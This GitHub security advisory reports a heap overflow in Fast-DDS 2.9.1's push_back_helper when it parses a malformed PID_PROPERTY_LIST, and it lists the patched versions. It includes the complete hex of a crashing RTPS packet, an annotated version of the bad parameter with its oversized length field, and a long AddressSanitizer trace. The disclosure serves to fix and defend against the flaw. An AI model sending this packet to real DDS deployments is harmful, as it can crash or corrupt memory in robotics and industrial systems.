Skip to content

Another heap overflow in push_back_helper

High
MiguelCompany published GHSA-mf55-5747-c4pv Aug 11, 2023

Package

Fast-DDS

Affected versions

2.9.1

Patched versions

>= 2.11.1 / 2.10.2 / 2.9.2 / 2.6.6

Description

Summary

Even after the fix in 3492270, malformed PID_PROPERTY_LIST parameters cause heap overflow at a different program counter.

Details

  • RTPS packet:
0000   52 54 50 53 02 02 ff ff 01 0f 45 d2 b3 f5 58 b9
0010   01 00 00 00 15 05 cc 00 00 00 10 00 00 01 00 c7
0020   00 01 00 c2 00 00 00 00 01 00 00 00 00 03 00 00
0030   15 00 04 00 02 02 00 00 16 00 04 00 01 0f 00 00
0040   50 00 10 00 01 0f 11 3e f6 42 cd 90 00 00 00 00
0050   00 00 01 c1 32 00 18 00 01 00 00 00 f2 1c 00 00
0060   00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 0f
0070   31 00 18 00 01 00 00 00 f3 1c 00 00 00 00 00 00
0080   00 00 00 00 00 00 00 00 0a 00 00 0f 02 00 08 00
0090   14 00 00 00 00 00 00 00 58 00 04 00 3f 0c 00 00
00a0   62 00 10 00 0a 00 00 00 70 75 62 6c 69 73 68 65
00b0   72 00 00 00 59 00 28 00 01 00 00 00 11 00 00 00
00c0   50 41 52 54 49 43 49 50 41 4e 54 5f 54 59 50 45
00d0   00 00 00 00 f3 ff ff ff 53 49 4d 50 4c 45 00 00
00e0   01 00 00 00
  • Bad parameter:
59 00 // PID_PROPERTY_LIST
28 00 // 40 bytes
01 00 // CDR_LE
00 00 // CDR opt

11 00 00 00 // size: 17
50 41 52 54 // <- data + padding
49 43 49 50 // -
41 4e 54 5f // -
54 59 50 45 // -
00 00 00 00 // ->

f3 ff ff ff // size: 4294967283
53 49 4d 50 4c 45 00 00 // data (insufficient)
  • Asan report:
=================================================================
==4118777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000036020 at pc 0x000000474523 bp 0x7f2dfb4fb7a0 sp 0x7f2dfb4faf60
WRITE of size 17 at 0x602000036020 thread T3
    #0 0x474522 in memcpy (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522)
    #1 0x7f2e0147b492 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back_helper(unsigned char const*, unsigned int, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1518:15
    #2 0x7f2e0147b3e8 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1448:25
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)
    #30 0x7f2e005ef608 in start_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread_create.c:477:8
    #31 0x7f2dffe34132 in clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95

0x602000036020 is located 0 bytes to the right of 16-byte region [0x602000036010,0x602000036020)
allocated by thread T3 here:
    #0 0x4d9582 in calloc (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4d9582)
    #1 0x7f2e0105275e in eprosima::fastrtps::rtps::SerializedPayload_t::reserve(unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/rtps/common/SerializedPayload.h:172:34
    #2 0x7f2e0147b3d2 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1444:28
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)

Thread T3 created by T0 here:
    #0 0x4c376c in pthread_create (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4c376c)
    #1 0x7f2e0014a0a8 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd70a8)
